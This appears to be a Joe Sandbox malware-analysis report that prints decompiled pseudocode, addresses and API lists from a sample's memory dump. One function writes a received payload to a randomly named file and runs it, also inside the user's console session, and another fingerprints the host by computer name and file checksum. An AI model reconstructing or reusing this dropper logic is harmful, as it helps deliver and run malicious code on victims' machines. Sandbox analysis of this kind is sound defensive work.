								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t390;
								_t513 =  *((intOrPtr*)(_t612 + 0x4c)) - 1;
								 *( *(_t612 + 0x28)) = _t390 - 3;
								_t587 = _t513 >> 8;
								( *(_t612 + 0x28))[1] = _t513;
								( *(_t612 + 0x28))[2] = _t587;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
								_t266 = _t612 + 0x38;
								 *_t266 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t266 == 0) {
									_t434 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t434;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t434[0]);
								}
								_t431 =  <  ?  *((_t513 & 0x000001ff) + 0x98b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x98b1a0) & 0x000000ff;
								 *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0x98b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x98b1a0) & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0x98b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x98b1a0) & 0x000000ff) * 2)) + 1;
								_t432 = _v64;
								if(_t432 >= 3) {
									 *((short*)(_t612 + 0x8192 + ( *(0x98b41a + _t432 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0x98b41a + _t432 * 2) & 0x0000ffff) * 2)) + 1;
								}
								_t528 =  *((intOrPtr*)(_t612 + 0x50)) - 1;
								 *((intOrPtr*)(_t612 + 0x50)) = 0;
							} else {
								_t543 =  *(_t612 + 0x54);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t543;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t200 = _t612 + 0x38;
								 *_t200 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t200 == 0) {
									_t453 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t453;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t453[0]);
								}
								 *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) + 1;
								if(_t508 < 0x80) {
									_t528 = _v56;
									 *(_t612 + 0x54) =  *(_t573 + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								} else {
									_t213 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t216 = _t602 - 1; // -1
									_t514 = _t216;
									_t590 = _t514 >> 8;
									 *( *(_t612 + 0x28)) = _t213;
									( *(_t612 + 0x28))[1] = _t514;
									( *(_t612 + 0x28))[2] = _t590;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t224 = _t612 + 0x38;
									 *_t224 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t224 == 0) {
										_t451 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t451;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t451[0]);
									}
									_t591 = _t590 & 0x0000007f;
									_t230 = (_t514 & 0x000001ff) + 0x98b220; // 0x201001d
									_t231 = _t591 + 0x98b1a0; // 0x12000000
									_t449 =  <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										 *((short*)(_t612 + 0x8192 + ( *(0x98b41a + _t528 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0x98b41a + _t528 * 2) & 0x0000ffff) * 2)) + 1;
									}
									 *((intOrPtr*)(_t612 + 0x50)) = 0;
								}
							}
						}
						goto L95;
					} else {
						break;
					}
					L103:
				}
				 *((intOrPtr*)(_t612 + 0x88)) = _t601;
				 *((intOrPtr*)(_t612 + 0x84)) = _v12;
				return 1;
				goto L103;
			}

0x009877f8
0x009877fb
0x009877fe
0x00987804
0x0098780a
0x00987810
0x00987813
0x00987816
0x00000000
0x00987820
0x00987838
0x00987840
0x009879c6
0x009879d0
0x009879d0
0x009879d9
0x00000000
0x00000000
0x009879e2
0x009879e3
0x009879e7
0x009879ec
0x009879ef
0x009879f0
0x009879f3
0x009879ff
0x00987a01
0x00987a01
0x00987a08
0x00987a0e
0x00987a16
0x00987a1e
0x00987a25
0x00987a38
0x00987a56
0x00987a60
0x00987a68
0x00987a6b
0x00987a73
0x00987a73
0x00987a78
0x00000000
0x00000000
0x00987a7e
0x00000000
0x00987a78
0x009879d0
0x00987846
0x00987849
0x0098784d
0x00987853
0x00987853
0x00987865
0x00987878
0x00987887
0x0098788b
0x00987890
0x00987893
0x00987896
0x00987899
0x0098789f
0x009878a1
0x009878a4
0x009878a7
0x009878b4
0x009878b6
0x009878b6
0x009878ce
0x009878d4
0x009878e2
0x009878ea
0x009878ed
0x009878f5
0x009878f6
0x009878fb
0x009878fb
0x009878fe
0x009878fe
0x0098790d
0x00987914
0x00987917
0x0098791a
0x00987928
0x0098792b
0x0098792f
0x00987937
0x0098793e
0x00987941
0x00987944
0x00987947
0x0098794a
0x00987958
0x0098795b
0x00987a8a
0x00987a8f
0x00987a92
0x00987a95
0x00987a9a
0x00987a9d
0x00987aa3
0x00987aac
0x00987abb
0x00987ac8
0x00987acd
0x00987b13
0x00987b13
0x00987b13
0x00987b16
0x00000000
0x00000000
0x00987b18
0x00987b22
0x00000000
0x00987b24
0x00987b29
0x00987b2c
0x00987b31
0x00000000
0x00987b33
0x00987b36
0x00987b3f
0x00987b49
0x00987bc0
0x00987bc2
0x00000000
0x00987bc8
0x00987bd1
0x00987bd4
0x00987bd9
0x00987b10
0x00000000
0x00987bdf
0x00987be8
0x00987bea
0x00987bf0
0x00987bf0
0x00987bf4
0x00987bf7
0x00987bfd
0x00000000
0x00000000
0x00987bff
0x00987c03
0x00987c06
0x00987c0c
0x00987c0e
0x00987c12
0x00987c15
0x00987c1b
0x00987c1d
0x00987c21
0x00987c24
0x00987c2a
0x00987c2c
0x00987c2d
0x00000000
0x00000000
0x00987c2d
0x00987c2a
0x00987c1b
0x00000000
0x00987c0c
0x00987c31
0x00987c34
0x00987c37
0x00987ca0
0x00987ca5
0x00987ca9
0x00000000
0x00987c39
0x00987c41
0x00987c4e
0x00987c54
0x00987c57
0x00987c5d
0x00000000
0x00987c63
0x00987c68
0x00987c6b
0x00987c70
0x00987c73
0x00987c76
0x00987c78
0x00987c7d
0x00000000
0x00987c83
0x00987c86
0x00987c8b
0x00987c93
0x00000000
0x00987c93
0x00987c7d
0x00987c5d
0x00987c37
0x00987bd9
0x00987b4b
0x00987b4b
0x00987b55
0x00000000
0x00987b5b
0x00987b60
0x00987b63
0x00987b69
0x00000000
0x00987b6f
0x00987b72
0x00987b80
0x00000000
0x00987b82
0x00987b82
0x00987b8c
0x00000000
0x00987b92
0x00987b97
0x00987b9a
0x00987ba0
0x00000000
0x00987ba6
0x00987ba9
0x00987bb7
0x00987bba
0x00000000
0x00000000
0x00000000
0x00000000
0x00987bba
0x00987ba0
0x00987b8c
0x00987b80
0x00987b69
0x00987b55
0x00987b49
0x00987b31
0x00987f55
0x00987f55
0x00987f58
0x00987f5e
0x00987f67
0x00987f70
0x00987f73
0x00987f78
0x00987fb1
0x00987fb6
0x00987fb9
0x00987fc1
0x00987fcc
0x00987fd0
0x00988002
0x00987fd2
0x00987fd2
0x00000000
0x00987fd2
0x00987f7a
0x00987f7a
0x00987f7d
0x00987f80
0x00987f89
0x0098781b
0x0098781b
0x00000000
0x00987f8f
0x00987f9f
0x00000000
0x00987fa1
0x00987fa8
0x00987fab
0x00000000
0x00000000
0x00000000
0x00000000
0x00987fab
0x00987f9f
0x00987f89
0x00000000
0x00987f78
0x00000000
0x00987acf
0x00987acf
0x00987acf
0x00987acf
0x00000000
0x00987961
0x00987963
0x00987ad2
0x00987ad5
0x00000000
0x00987cb1
0x00987cb1
0x00987cb4
0x00000000
0x00987cb4
0x00987976
0x00987979
0x0098797c
0x00987984
0x0098798d
0x00987a83
0x00987a83
0x00987a85
0x00987ae3
0x00987ae3
0x00987ae6
0x00987aeb
0x00987cb7
0x00987cb7
0x00987cb9
0x00987cbb
0x00987af1
0x00987af7
0x00000000
0x00987b06
0x00987af7
0x00987993
0x00987996
0x009879a0
0x009879a9
0x009879ac
0x00000000
0x00000000
0x00000000
0x009879ac
0x009879ae
0x009879b4
0x00000000
0x009879ba
0x009879ba
0x00000000
0x009879ba
0x009879b4
0x0098798d
0x00987963
0x00987cbe
0x00987cc3
0x00987e53
0x00987e9b
0x00987ed3
0x00987ed6
0x00987ed9
0x00987ed9
0x00987ede
0x00987ee1
0x00987ee6
0x00987eec
0x00987ef2
0x00987efc
0x00987efe
0x00987efe
0x00987f01
0x00987f03
0x00987f06
0x00987f0a
0x00987f11
0x00987f11
0x00987f16
0x00987f24
0x00987f2b
0x00987f32
0x00987f35
0x00987f38
0x00987f43
0x00987f45
0x00000000
0x00987f45
0x00987ead
0x00987ead
0x00987eb7
0x00987ec2
0x00987ec5
0x00987ec8
0x00987ec8
0x00987e55
0x00987e5c
0x00987e5f
0x00987e69
0x00987e6c
0x00987e71
0x00987e74
0x00987e76
0x00987e76
0x00987e79
0x00987e7b
0x00987e7e
0x00987e82
0x00987e89
0x00987e89
0x00987e8c
0x00987e8f
0x00987f4d
0x00987f4d
0x00987f4d
0x00987cc9
0x00987ccb
0x00987dbb
0x00987dc7
0x00987dca
0x00987dcf
0x00987dd2
0x00987dd8
0x00987dde
0x00987de8
0x00987dea
0x00987dea
0x00987ded
0x00987def
0x00987df2
0x00987df6
0x00987dfd
0x00987dfd
0x00987e1e
0x00987e21
0x00987e29
0x00987e2f
0x00987e39
0x00987e39
0x00987e44
0x00987e45
0x00987cd1
0x00987cd4
0x00987cd7
0x00987cda
0x00987cdf
0x00987ce2
0x00987ce4
0x00987ce4
0x00987ce7
0x00987ce9
0x00987cec
0x00987cf0
0x00987cf7
0x00987cf7
0x00987cfd
0x00987d0b
0x00987daa
0x00987dad
0x00987db0
0x00987db3
0x00987d11
0x00987d14
0x00987d17
0x00987d1a
0x00987d1a
0x00987d1f
0x00987d22
0x00987d27
0x00987d2d
0x00987d33
0x00987d3d
0x00987d3f
0x00987d3f
0x00987d42
0x00987d44
0x00987d47
0x00987d4b
0x00987d52
0x00987d52
0x00987d57
0x00987d65
0x00987d6c
0x00987d73
0x00987d76
0x00987d79
0x00987d84
0x00987d8e
0x00987d8e
0x00987d96
0x00987d96
0x00987d0b
0x00987ccb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0098791a
0x00987fe2
0x00987fe9
0x00987ff4
0x00000000

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec53155a392ea3b8315e2a12178cdfe2d734b300e23c6d33dec3def58fdc6749
Instruction ID: a64fd1568ba49f81e61b929316a1c92f268722a931f15e7fddd92be2af9e4bfb
Opcode Fuzzy Hash: ec53155a392ea3b8315e2a12178cdfe2d734b300e23c6d33dec3def58fdc6749
Instruction Fuzzy Hash: 90429D35A08B458FCB25DFA9C4906AAFBF2FF88304F28896DD49A97751D734E941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00981BE0, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction ID: 9d64b54a5658bb455bbaa6a9331116b1bfdc9d5684ee5f51caa6be77a4b0add6
Opcode Fuzzy Hash: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction Fuzzy Hash: 0201F7336400199BCB24EF4AD5816B9F3EDFB94365B9940AEE98887300E731AD92C790

Uniqueness

Uniqueness Score: -1.00%

Function 0098A3A0, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 225
memoryfileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0098A3A0(long _a4) {
				void* _v8;
				long _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v96;
				char _v156;
				char _v284;
				short _v804;
				char _v1324;
				void* _t58;
				signed int _t62;
				WCHAR* _t68;
				long _t89;
				signed int _t93;
				WCHAR* _t99;
				void* _t122;
				void* _t123;
				void* _t136;
				void* _t139;
				void* _t140;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;

				_t136 = _a4;
				_t58 =  *((intOrPtr*)(_t136 + 4)) - 1;
				if(_t58 == 0) {
					_t122 =  *(_t136 + 8);
					_a4 =  *((intOrPtr*)(_t136 + 0xc));
					 *0x98c214(0, 0x23, 0, 0,  &_v804);
					_t62 = GetTickCount();
					_t39 = (_t62 & 0x0000000f) + 4; // 0x4
					E00982240( &_v284, _t39);
					 *((short*)(_t146 + (_t62 & 0x0000000f) * 2 - 0x110)) = 0;
					E00981830(0x9815a4, 0xc, 0x435ca571,  &_v12);
					_t139 = _v12;
					_t68 =  &_v804;
					 *0x98c200(_t68, 0x104, _t139, _t68,  &_v284);
					HeapFree(GetProcessHeap(), 0, _t139);
					_t140 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_t140 == 0xffffffff) {
						L13:
						HeapFree(GetProcessHeap(), 0, _t136);
						return 0;
					}
					WriteFile(_t140, _t122, _a4,  &_a4, 0);
					CloseHandle(_t140);
					memset( &_v96, 0, 0x44);
					_v96.cb = 0x44;
					if(CreateProcessW( &_v804, 0, 0, 0, 0, 0, 0, 0,  &_v96,  &_v28) == 0) {
						goto L13;
					}
					CloseHandle(_v28.hProcess);
					_push(_v28.hThread);
					L12:
					CloseHandle();
					goto L13;
				}
				if(_t58 != 1) {
					goto L13;
				}
				_t89 =  *((intOrPtr*)(_t136 + 0xc));
				_t123 =  *(_t136 + 8);
				_v12 = _t89;
				_a4 = 0;
				__imp__WTSGetActiveConsoleSessionId();
				if(_t89 == 0xffffffff) {
					goto L13;
				}
				_push( &_v8);
				_push(_t89);
				if( *0x98c224() != 0) {
					 *0x98c074(_v8, 0x2000000, 0, 1, 1,  &_a4);
					CloseHandle(_v8);
				}
				 *0x98c214(0, 0x23, 0, 0,  &_v804);
				_t93 = GetTickCount();
				_t13 = (_t93 & 0x0000000f) + 4; // 0x4
				E00982240( &_v156, _t13);
				 *((short*)(_t146 + (_t93 & 0x0000000f) * 2 - 0x90)) = 0;
				E00981830(0x9815a4, 0xc, 0x435ca571,  &_v8);
				_t143 = _v8;
				_t99 =  &_v804;
				 *0x98c200(_t99, 0x104, _t143, _t99,  &_v156);
				HeapFree(GetProcessHeap(), 0, _t143);
				_t144 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t144 != 0xffffffff) {
					WriteFile(_t144, _t123, _v12,  &_v12, 0);
					CloseHandle(_t144);
					E00981830(0x981398, 4, 0x435ca571,  &_v8);
					_t145 = _v8;
					 *0x98c200( &_v1324, 0x104, _t145,  &_v804);
					HeapFree(GetProcessHeap(), 0, _t145);
					if(E00982180( &_v1324, _a4,  &_v28) != 0) {
						CloseHandle(_v28);
						CloseHandle(_v28.hThread);
					}
				}
				_push(_a4);
				goto L12;
			}

0x0098a3ac
0x0098a3b2
0x0098a3b3
0x0098a550
0x0098a553
0x0098a565
0x0098a56b
0x0098a57c
0x0098a57f
0x0098a58b
0x0098a5a1
0x0098a5a6
0x0098a5b0
0x0098a5be
0x0098a5d1
0x0098a5f6
0x0098a5fb
0x0098a666
0x0098a670
0x0098a67e
0x0098a67e
0x0098a608
0x0098a60f
0x0098a61d
0x0098a626
0x0098a652
0x00000000
0x00000000
0x0098a657
0x0098a65d
0x0098a660
0x0098a660
0x00000000
0x0098a660
0x0098a3ba
0x00000000
0x00000000
0x0098a3c0
0x0098a3c3
0x0098a3c6
0x0098a3c9
0x0098a3d0
0x0098a3d9
0x00000000
0x00000000
0x0098a3e2
0x0098a3e3
0x0098a3ec
0x0098a400
0x0098a409
0x0098a409
0x0098a41e
0x0098a424
0x0098a435
0x0098a438
0x0098a444
0x0098a45a
0x0098a45f
0x0098a469
0x0098a477
0x0098a48a
0x0098a4af
0x0098a4b4
0x0098a4c5
0x0098a4cc
0x0098a4e5
0x0098a4ea
0x0098a501
0x0098a514
0x0098a531
0x0098a536
0x0098a53f
0x0098a53f
0x0098a531
0x0098a545
0x00000000

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 0098A3D0
CloseHandle.KERNEL32(?), ref: 0098A409
GetTickCount.KERNEL32 ref: 0098A424
_snwprintf.NTDLL ref: 0098A477
GetProcessHeap.KERNEL32(00000000,?), ref: 0098A483
HeapFree.KERNEL32(00000000), ref: 0098A48A
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0098A4A9
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0098A4C5
CloseHandle.KERNEL32(00000000), ref: 0098A4CC
_snwprintf.NTDLL ref: 0098A501
GetProcessHeap.KERNEL32(00000000,?), ref: 0098A50D
HeapFree.KERNEL32(00000000), ref: 0098A514
CloseHandle.KERNEL32(?), ref: 0098A536
CloseHandle.KERNEL32(?), ref: 0098A53F
GetTickCount.KERNEL32 ref: 0098A56B
_snwprintf.NTDLL ref: 0098A5BE
GetProcessHeap.KERNEL32(00000000,?), ref: 0098A5CA
HeapFree.KERNEL32(00000000), ref: 0098A5D1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0098A5F0
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0098A608
CloseHandle.KERNEL32(00000000), ref: 0098A60F
memset.NTDLL ref: 0098A61D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0098A64A
CloseHandle.KERNEL32(?), ref: 0098A657
CloseHandle.KERNEL32(?), ref: 0098A660
GetProcessHeap.KERNEL32(00000000,?), ref: 0098A669
HeapFree.KERNEL32(00000000), ref: 0098A670

Strings

D, xrefs: 0098A626

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandle$Process$FileFree$Create_snwprintf$CountTickWrite$ActiveConsoleSessionmemset
String ID: D
API String ID: 65010116-2746444292
Opcode ID: 167ebbd1e9361fdc1c0237eec16ab5bd557389462b466db2c99f38f382d184f2
Instruction ID: 7cc9032b03bcd222bfd88576258142d8f89ca3056ccf51a22e4f03cf176c8a1d
Opcode Fuzzy Hash: 167ebbd1e9361fdc1c0237eec16ab5bd557389462b466db2c99f38f382d184f2
Instruction Fuzzy Hash: E6815FB1954108BFEB10ABA0DC8EFEA7B7CFF08711F044151F619E62E1D7709A459BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00989320, Relevance: 39.2, APIs: 26, Instructions: 246
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00989320(void* __ecx) {
				void* _v8;
				long _v12;
				short _v44;
				intOrPtr _t25;
				void* _t27;
				void* _t28;
				signed int _t32;
				char* _t35;
				int _t53;
				signed int _t60;
				void* _t71;
				long _t72;
				void* _t74;
				void* _t75;
				signed int _t76;
				char _t77;
				void* _t79;
				signed short* _t80;
				long _t87;
				void* _t92;
				void* _t94;
				short* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t75 = __ecx;
				_t25 =  *0x98c27c; // 0x0
				_t103 = _t102 - 0x28;
				 *0x98c3ac = _t25;
				GetModuleFileNameW(0, 0x98c9c8, 0x104);
				_t27 =  *0x98c040(0, 0, 6);
				if(_t27 != 0) {
					 *0x98c2a4 =  *0x98c2a4 | 0x00000001;
					 *0x98c0a8(_t27);
				}
				_t28 =  *0x98c3ac; // 0x0
				_t96 = 0x98c3b0;
				_v8 = _t28;
				_t92 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
				if(_t92 == 0) {
					_t92 = _v12;
				} else {
					_push(_t75);
					E00981790(0x9813d0, 0x158, _t92);
					_t103 = _t103 + 8;
				}
				_t76 =  *0x98c1e4(_t92, _t71);
				_t72 = 2;
				_v12 = _t76;
				do {
					_t32 = _v8;
					_v8 =  !(_t32 / _t76);
					_t35 = _t92 + _t32 % _t76;
					if(_t35 <= _t92) {
						L9:
						if( *_t35 != 0x2c) {
							L11:
							_t77 =  *_t35;
							if(_t77 == 0) {
								goto L15;
							}
							while(_t77 != 0x2c) {
								_t35 = _t35 + 1;
								 *_t96 = _t77;
								_t96 = _t96 + 2;
								_t77 =  *_t35;
								if(_t77 != 0) {
									continue;
								}
								goto L15;
							}
							goto L15;
						}
						L10:
						_t35 = _t35 + 1;
						goto L11;
					}
					while( *_t35 != 0x2c) {
						_t35 = _t35 - 1;
						if(_t35 > _t92) {
							continue;
						}
						goto L9;
					}
					goto L10;
					L15:
					_t76 = _v12;
					_t72 = _t72 - 1;
				} while (_t72 != 0);
				HeapFree(GetProcessHeap(), 0, _t92);
				 *_t96 = 0;
				E00981830(0x981384, 0xc, 0x7d1cc189,  &_v12);
				_t104 = _t103 + 8;
				_push(0x98c5b8);
				_push(0);
				_push(0);
				if(( *0x98c2a4 & 0x00000001) == 0) {
					 *0x98c214(0, 0x1c);
					_t87 = 0x14;
					_t79 = 0x981530;
				} else {
					 *0x98c214(0, 0x29);
					_t87 = 4;
					_t79 = 0x981380;
				}
				E00981830(_t79, _t87, 0x7d1cc189,  &_v8);
				_t97 = _v8;
				 *0x98c200(0x98c5b8, 0x104, _t97, 0x98c5b8, 0x98c3b0);
				HeapFree(GetProcessHeap(), 0, _t97);
				_t98 = _v12;
				 *0x98c200(0x98c7c0, 0x104, _t98, 0x98c5b8, 0x98c3b0);
				_t106 = _t104 + 0x30;
				HeapFree(GetProcessHeap(), 0, _t98);
				_t99 = CreateFileW(0x98c9c8, 0x80000000, 1, 0, 3, 0, 0);
				if(_t99 != 0xffffffff) {
					_t94 = CreateFileMappingW(_t99, 0, 2, 0, 0, 0);
					if(_t94 != 0) {
						_t74 = MapViewOfFile(_t94, 4, 0, 0, 0);
						if(_t74 != 0) {
							 *0x98cbd0 = RtlComputeCrc32(0, _t74, GetFileSize(_t99, 0));
							UnmapViewOfFile(_t74);
						}
						CloseHandle(_t94);
					}
					CloseHandle(_t99);
				}
				_v12 = 0x10;
				_t53 = GetComputerNameW( &_v44,  &_v12);
				if(_t53 == 0) {
					L40:
					return _t53;
				} else {
					_t80 =  &_v44;
					if(_v44 == 0) {
						L36:
						_t101 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
						if(_t101 == 0) {
							_t101 = _v12;
						} else {
							_push(_t80);
							E00981790(0x981390, 8, _t101);
							_t106 = _t106 + 8;
						}
						 *0x98c210(0x98c2a8, 0x104, _t101,  &_v44,  *0x98c3ac);
						_t53 = HeapFree(GetProcessHeap(), 0, _t101);
						goto L40;
					}
					do {
						_t60 =  *_t80 & 0x0000ffff;
						if(_t60 < 0x30 || _t60 > 0x39) {
							if(_t60 < 0x61 || _t60 > 0x7a) {
								if(_t60 < 0x41 || _t60 > 0x5a) {
									 *_t80 = 0x58;
								}
							}
						}
						_t80 =  &(_t80[1]);
					} while ( *_t80 != 0);
					goto L36;
				}
			}

0x00989320
0x00989323
0x00989328
0x0098932b
0x0098933c
0x00989348
0x00989350
0x00989352
0x0098935a
0x0098935a
0x00989360
0x0098936e
0x00989373
0x00989383
0x00989387
0x0098939f
0x00989389
0x00989389
0x00989395
0x0098939a
0x0098939a
0x009893aa
0x009893ac
0x009893b1
0x009893b4
0x009893b4
0x009893bd
0x009893c0
0x009893c5
0x009893d1
0x009893d4
0x009893d7
0x009893d7
0x009893db
0x00000000
0x00000000
0x009893e0
0x009893e9
0x009893ea
0x009893ed
0x009893f0
0x009893f4
0x00000000
0x00000000
0x00000000
0x009893f4
0x00000000
0x009893e0
0x009893d6
0x009893d6
0x00000000
0x009893d6
0x009893c7
0x009893cc
0x009893cf
0x00000000
0x00000000
0x00000000
0x009893cf
0x00000000
0x009893f6
0x009893f6
0x009893f9
0x009893f9
0x00989406
0x00989413
0x00989424
0x00989429
0x00989433
0x00989438
0x0098943a
0x0098943c
0x00989458
0x0098945e
0x00989463
0x0098943e
0x00989442
0x00989448
0x0098944d
0x0098944d
0x00989471
0x00989476
0x0098948e
0x009894a1
0x009894a7
0x009894bf
0x009894c5
0x009894d2
0x009894f2
0x009894f7
0x0098950a
0x0098950e
0x0098951f
0x00989523
0x00989539
0x0098953e
0x0098953e
0x00989545
0x00989545
0x0098954c
0x0098954c
0x00989555
0x00989561
0x0098956a
0x0098960b
0x00989610
0x00989570
0x00989575
0x00989578
0x009895ad
0x009895be
0x009895c2
0x009895da
0x009895c4
0x009895c4
0x009895d0
0x009895d5
0x009895d5
0x009895f2
0x00989605
0x00000000
0x00989605
0x00989580
0x00989580
0x00989586
0x00989590
0x0098959a
0x009895a1
0x009895a1
0x0098959a
0x00989590
0x009895a4
0x009895a7
0x00000000
0x00989580

APIs

GetModuleFileNameW.KERNEL32(00000000,0098C9C8,00000104,?,?,?,?,?,?,?,?,?,00989310), ref: 0098933C
GetProcessHeap.KERNEL32(00000008,0000015C,00000000,009816C0,?,?,?,?,?,?,?,?,?,00989310), ref: 00989376
RtlAllocateHeap.NTDLL(00000000), ref: 0098937D
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00989310), ref: 009893A4
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00989310), ref: 009893FF
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00989310), ref: 00989406
_snwprintf.NTDLL ref: 0098948E
GetProcessHeap.KERNEL32(00000000,00989310), ref: 0098949A
HeapFree.KERNEL32(00000000), ref: 009894A1
_snwprintf.NTDLL ref: 009894BF
GetProcessHeap.KERNEL32(00000000,?), ref: 009894CB
HeapFree.KERNEL32(00000000), ref: 009894D2
CreateFileW.KERNEL32(0098C9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009894EC
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00989504
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00989519
GetFileSize.KERNEL32(00000000,00000000), ref: 00989528
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00989532
UnmapViewOfFile.KERNEL32(00000000), ref: 0098953E
CloseHandle.KERNEL32(00000000), ref: 00989545
CloseHandle.KERNEL32(00000000), ref: 0098954C
GetComputerNameW.KERNEL32(?,?), ref: 00989561
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 009895B1
RtlAllocateHeap.NTDLL(00000000), ref: 009895B8
_snprintf.NTDLL ref: 009895F2
GetProcessHeap.KERNEL32(00000000,00000010), ref: 009895FE
HeapFree.KERNEL32(00000000), ref: 00989605

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

